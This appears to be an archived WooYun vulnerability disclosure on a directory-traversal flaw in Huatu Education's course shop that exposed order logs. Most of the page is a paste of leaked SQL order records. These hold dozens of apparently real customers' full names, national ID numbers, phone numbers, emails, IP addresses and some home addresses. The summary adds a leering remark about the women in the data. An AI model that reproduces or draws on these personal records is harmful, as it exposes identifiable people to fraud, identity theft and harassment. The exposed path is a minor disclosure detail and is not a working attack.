当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0162958

漏洞标题:点到为止之华图教育多个漏洞打包(大量用户订单敏感信息--截止今日信息)

相关厂商:华图教育

漏洞作者: 带头大哥

提交时间:2015-12-21 11:25

修复时间:2016-02-04 17:47

公开时间:2016-02-04 17:47

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-21: 细节已通知厂商并且等待厂商处理中
2015-12-22: 厂商已经确认,细节仅向厂商公开
2016-01-01: 细节向核心白帽子及相关领域专家公开
2016-01-11: 细节向普通白帽子公开
2016-01-21: 细节向实习白帽子公开
2016-02-04: 细节向公众公开

简要描述:

包括不限于姓名、电话、邮箱、家庭地址、订单、教育情况等。大多为美女哦~

详细说明:

0x01:目录遍历

http://bm.huatu.com/plus/


2015-12-20_161142.png


2015-12-20_161432.png


bm.huatu.com商城,因此大量用户订单敏感信息泄露,信息量太大,我只贴一小段点到为止:

date:20151220131740
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
		VALUES ('S-P1450587909RN690','2316096','1','258.00','0','202.101.102.194','1450588660','1','2','0','258','bm5.huatu.com','18649850225');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('643975','S-P1450587909RN690','2316096','2016年福建省农信社考试笔试辅导课程','258.00','1','GFZNX51608','福州分校','闽侯分部','54','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
			 VALUES ('2316096','S-P1450587909RN690','林思敏','350625199304271522','女','18649850225','[email protected]','','应届','','','','');
date:20151220132215
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
		VALUES ('S-P1450588789RN154','2285185','1','3280.00','0','61.55.250.123','1450588935','1','2','0','3280','bm5.huatu.com','18232163775');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('637392','S-P1450588789RN154','2285185','2015年河北省邯郸市事业单位考试笔试-提高特训班GHBSY51529','3280.00','1','GHBSY51529','河北分校','邯郸学习中心','99','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
			 VALUES ('2285185','S-P1450588789RN154','崔飞飞','130428199311102345','女','18232163775','[email protected]','','在职','','','','');
date:20151220132304
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
		VALUES ('S-P1450588885RN149','2312748','1','12.00','0','117.136.66.136','1450588984','1','2','0','12','bm5.huatu.com','18205150176');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('642570','S-P1450588885RN149','2312748','2016年江苏省考笔试辅导课程','12.00','1','GJSSK016201','南京分校','南京分部','24','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
			 VALUES ('2312748','S-P1450588885RN149','张思敏','321084199412272146','女','18205150176','[email protected]','','应届','','','','');
date:20151220132448
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
		VALUES ('S-P1450588935RN131','2285185','1','3280.00','0','61.55.250.123','1450589088','1','2','0','3280','bm5.huatu.com','13832324363');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('637392','S-P1450588935RN131','2285185','2015年河北省邯郸市事业单位考试笔试-提高特训班GHBSY51529','3280.00','1','GHBSY51529','河北分校','邯郸学习中心','99','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
			 VALUES ('2285185','S-P1450588935RN131','张雪彬','130425199101217137','男','13832324363','[email protected]','','在职','','','','');
date:20151220132522
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
		VALUES ('S-P1450588428RN891','1024700','1','19800.00','0','175.22.6.42','1450589122','1','2','0','19800','bm5.huatu.com','13567171391');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('622089','S-P1450588428RN891','1024700','2016年浙江省公务员考试笔试辅导课程','19800.00','1','GZJSK016004','浙江分校','杭州总部','472','','9800','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
			 VALUES ('1024700','S-P1450588428RN891','张雷','330329199012301174','男','13567171391','[email protected]','','其它','','其它','手机信息','浙江省温州市泰顺县三魁镇下武洋村');
date:20151220132718
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
		VALUES ('S-P1450588984RN868','2312748','1','12.00','0','117.136.66.136','1450589238','1','2','0','12','bm5.huatu.com','18205150176');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('642570','S-P1450588984RN868','2312748','2016年江苏省考笔试辅导课程','12.00','1','GJSSK016201','南京分校','南京分部','24','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
			 VALUES ('2312748','S-P1450588984RN868','张思敏','321084199412272146','女','18205150176','[email protected]','','应届','','','','');
date:20151220133431
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
		VALUES ('S-P1450588053RN228','2316933','1','19.00','0','175.9.198.173','1450589671','1','2','0','19','bm5.huatu.com','18274821784');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('635007','S-P1450588053RN228','2316933','2016年湖南省长沙市河东分校省考笔试视频直播七点半课堂GCSSKD1611A','19.00','1','GCSSKD1611A','长沙分校','长沙总部','90','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
			 VALUES ('2316933','S-P1450588053RN228','向群','433101199209102020','女','18274821784','[email protected]','','在职','','','','');
date:20151220133432
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
		VALUES ('S-P1450589345RN611','2316950','1','99.00','0','43.226.121.88','1450589672','1','2','0','99','bm5.huatu.com','15024384917');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('639940','S-P1450589345RN611','2316950','2016年浙江省公务员考试培训辅导课程','99.00','1','GZJSKE16013','浙江分校','金华学习中心','72','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
			 VALUES ('2316950','S-P1450589345RN611','黄林美','330722199103196469','女','15024384917','[email protected]','','在职','','','','');
date:20151220133631
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
		VALUES ('S-P1450589722RN862','2116687','1','99.00','0','43.226.121.88','1450589791','1','2','0','99','bm5.huatu.com','18267932875');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('639457','S-P1450589722RN862','2116687','2016年浙江省公务员笔试考试辅导课程','99.00','1','GZJSK016888','浙江分校','杭州总部','72','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
			 VALUES ('2116687','S-P1450589722RN862','胡冰洁','330621199309227142','女','18267932875','[email protected]','','在职','','','','磐安县安文镇海螺街1号磐安县文化广电新闻出版局');
date:20151220133954
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
		VALUES ('S-P1450589777RN600','2316978','1','880.00','0','60.22.179.48','1450589994','1','2','0','660','bm5.huatu.com','18524279908');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('638193','S-P1450589777RN600','2316978','2016年省考公安基础知识提前学GLNSKSP01601','880.00','1','GLNSKSP01601','沈阳分校','沈阳总部','72','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
			 VALUES ('2316978','S-P1450589777RN600','郭美辰','211102199002480024','女','18524279908','[email protected]','','在职','','','','盘锦市兴隆台区双兴宾馆对面华图教育');
date:20151220134053
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
		VALUES ('S-P1450589861RN418','1162410','1','99.00','0','112.17.237.23','1450590053','1','2','0','99','bm5.huatu.com','13666895489');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('639457','S-P1450589861RN418','1162410','2016年浙江省公务员笔试考试辅导课程','99.00','1','GZJSK016888','浙江分校','杭州总部','72','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
			 VALUES ('1162410','S-P1450589861RN418','王寅','331002199204230010','男','13666895489','[email protected]','','在职','','其它','朋友推荐','');
date:20151220135846
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
		VALUES ('S-P1450577158RN883','2316665','1','4980.00','0','14.217.78.22','1450591126','1','2','0','4980','bm5.huatu.com','15625001438');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('641111','S-P1450577158RN883','2316665','2016年东莞市教师招聘面试导师封闭特训班TMSZJS11624','4980.00','1','TMSZJS11624','深圳分校','深圳总部','60','','0','','',2)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
			 VALUES ('2316665','S-P1450577158RN883','刘淑娴','44190019940523436X','女','15625001438','[email protected]','','应届','','网络','华图网站','');
date:20151220140023
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
		VALUES ('S-P1450591132RN182','1506712','1','9.90','0','183.61.37.28','1450591223','1','2','0','9.9','bm5.huatu.com','13158949621');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('641883','S-P1450591132RN182','1506712','2016年海南省公务员考试视频直播课程','9.90','1','GHKSK01646','海南分校','海口总部','38','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
			 VALUES ('1506712','S-P1450591132RN182','陈慧慧','46003319881018004X','女','13158949621','[email protected]','','在职','','','','');
date:20151220140710
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
		VALUES ('S-P1450591557RN443','573731','1','258.00','0','36.250.94.130','1450591630','1','2','0','258','bm5.huatu.com','15806027313');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('643975','S-P1450591557RN443','573731','2016年福建省农信社考试笔试辅导课程','258.00','1','GFZNX51608','福州分校','闽侯分部','54','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
			 VALUES ('573731','S-P1450591557RN443','柯江云','350583199007171056','男','15806027313','[email protected]','','在职','','网络','分类信息网站','');
date:20151220140904
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
		VALUES ('S-P1450577887RN151','1585096','1','4080.00','0','140.246.12.194','1450591744','1','2','0','4080','bm5.huatu.com','18661825369');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('640483','S-P1450577887RN151','1585096','2016年山东省农信社及青岛农商银行考试笔试辅导课程名师模块班GQDNX01603','4080.00','1','GQDNX01603','青岛分校','青岛总部','108','','1100','','',2)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
			 VALUES ('1585096','S-P1450577887RN151','赵月','370214199401034548','女','18661825369','[email protected]','','应届','','网络','华图网站','');
date:20151220141106
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
		VALUES ('S-P1450591738RN221','1851629','1','99.00','0','220.191.253.25','1450591866','1','2','0','99','bm5.huatu.com','13857092145');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('639457','S-P1450591738RN221','1851629','2016年浙江省公务员笔试考试辅导课程','99.00','1','GZJSK016888','浙江分校','杭州总部','72','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
			 VALUES ('1851629','S-P1450591738RN221','范佳华','332526198706253516','男','13857092145','[email protected]','','在职','','','','丽水市继光街27号310室');
date:20151220141622
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
		VALUES ('S-P1450591873RN936','2317046','1','258.00','0','218.106.150.254','1450592182','1','2','0','258','bm5.huatu.com','15980566164');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('643976','S-P1450591873RN936','2317046','2016年福建省农信社考试笔试辅导课程','258.00','1','GFZNX51607','福州分校','闽侯分部','54','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
			 VALUES ('2317046','S-P1450591873RN936','游厦莲','350128199306050928','女','15980566164','[email protected]','','应届','','其它','朋友推荐','福建省福州市闽侯县上街镇福建江夏学院生活区');
date:20151220141724
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
		VALUES ('S-P1450592126RN688','1587197','1','49.00','0','182.105.8.204','1450592244','1','2','0','49','bm5.huatu.com','13767895570');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('643328','S-P1450592126RN688','1587197','2016年江西省教师招聘笔试','49.00','1','TBJXJS01600','南昌分校','南昌分部','21','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
			 VALUES ('1587197','S-P1450592126RN688','叶谢丽莎','360302199301064529','女','13767895570','[email protected]','','其它','','网络','华图网站','江西省萍乡市安源区滨河东路同聚大酒店往北桥方向100米(可叫中碗菜代收)');
date:20151220142409
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
		VALUES ('S-P1450592244RN207','1587197','1','49.00','0','182.105.8.204','1450592649','1','2','0','49','bm5.huatu.com','13767895570');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('643328','S-P1450592244RN207','1587197','2016年江西省教师招聘笔试','49.00','1','TBJXJS01600','南昌分校','南昌分部','21','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
			 VALUES ('1587197','S-P1450592244RN207','叶谢丽莎','360302199301064529','女','13767895570','[email protected]','','其它','','网络','华图网站','江西省萍乡市安源区滨河东路同聚大酒店往北桥方向100米(可叫中碗菜柜台代收)');
date:20151220143752
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
		VALUES ('S-P1450593299RN434','2310524','1','11000.00','0','113.84.223.183','1450593472','1','2','0','11000','bm5.huatu.com','15915814149');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('644222','S-P1450593299RN434','2310524','圣诞活动班号GSZPRZ01608Y','11000.00','1','GSZPRZ01608Y','深圳分校','深圳总部','273','','3000','','',2)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
			 VALUES ('2310524','S-P1450593299RN434','郑则坤','440582199012010914','男','15915814149','[email protected]','','在职','','','','');
date:20151220144105
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
		VALUES ('S-P1450593587RN850','2187376','1','49.00','0','14.17.37.43','1450593665','1','2','0','49','bm5.huatu.com','18370881269');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('643328','S-P1450593587RN850','2187376','2016年江西省教师招聘笔试','49.00','1','TBJXJS01600','南昌分校','南昌分部','21','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
			 VALUES ('2187376','S-P1450593587RN850','李晓海','360722199010103660','女','18370881269','[email protected]','','在职','','网络','华图网站','江西省赣州市上犹县梅水乡洋田村');
date:20151220144231
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
		VALUES ('S-P1450593472RN886','2310524','1','11000.00','0','113.84.223.183','1450593751','1','2','0','11000','bm5.huatu.com','15915814149');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('644222','S-P1450593472RN886','2310524','圣诞活动班号GSZPRZ01608Y','11000.00','1','GSZPRZ01608Y','深圳分校','深圳总部','273','','3000','','',2)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
			 VALUES ('2310524','S-P1450593472RN886','郑则坤','440582199012010914','男','15915814149','[email protected]','','在职','','','','');
date:20151220144601
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
		VALUES ('S-P1450593602RN745','1609559','1','5320.00','0','61.191.254.226','1450593961','1','2','0','5320','bm5.huatu.com','15055136368');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('643169','S-P1450593602RN745','1609559','2015年下半年合肥市直事业单位面试全封闭密训营','5320.00','1','MAHSY01588C','安徽分校','合肥总部','72','5320','420','AHSY201511280018','',2)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
			 VALUES ('1609559','S-P1450593602RN745','李样','340822199305036284','女','15055136368','[email protected]','','其它','','','','');
date:20151220145548
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
		VALUES ('S-P1450594479RN753','2315671','1','258.00','0','27.151.185.190','1450594548','1','2','0','258','bm5.huatu.com','15205913632');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('643976','S-P1450594479RN753','2315671','2016年福建省农信社考试笔试辅导课程','258.00','1','GFZNX51607','福州分校','闽侯分部','54','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
			 VALUES ('2315671','S-P1450594479RN753','许灿荣','350521199112165011','男','15205913632','[email protected]','','在职','','','','');
date:20151220145807
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
		VALUES ('S-P1450594603RN130','867256','1','258.00','0','58.23.79.20','1450594687','1','2','0','258','bm5.huatu.com','15906063627');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('643976','S-P1450594603RN130','867256','2016年福建省农信社考试笔试辅导课程','258.00','1','GFZNX51607','福州分校','闽侯分部','54','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
			 VALUES ('867256','S-P1450594603RN130','林丽芳','350583199112018088','女','15906063627','[email protected]','','在职','','网络','华图网站','');
date:20151220151337
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
		VALUES ('S-P1450594856RN317','2317122','1','258.00','0','175.43.82.103','1450595617','1','2','0','258','bm5.huatu.com','15880806389');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('643976','S-P1450594856RN317','2317122','2016年福建省农信社考试笔试辅导课程','258.00','1','GFZNX51607','福州分校','闽侯分部','54','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
			 VALUES ('2317122','S-P1450594856RN317','柯燕芳','350583199205101040','女','15880806389','[email protected]','','在职','','网络','QQ','');
date:20151220152141
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
		VALUES ('S-P1450595984RN225','2317147','1','4780.00','0','120.43.85.32','1450596101','1','2','0','4780','bm5.huatu.com','13605929082');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('630018','S-P1450595984RN225','2317147','2015年事业单位面试辅导课程 实战突破班 MXMSY01538','4780.00','1','MXMSY01538','厦门分校','厦门总部','48','','500','','',2)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
			 VALUES ('2317147','S-P1450595984RN225','刘子瑞','350821198611040418','男','13605929082','[email protected]','','其它','','网络','华图网站','');
date:20151220152726
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
		VALUES ('S-P1450596084RN551','2052263','1','1680.00','0','183.62.131.1','1450596446','1','2','0','1680','bm5.huatu.com','15918638599');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('642456','S-P1450596084RN551','2052263','2015年深圳市考在职特训班GSZPRZ01609D','1680.00','1','GSZPRZ01609D','深圳分校','深圳总部','120','','0','','',0)
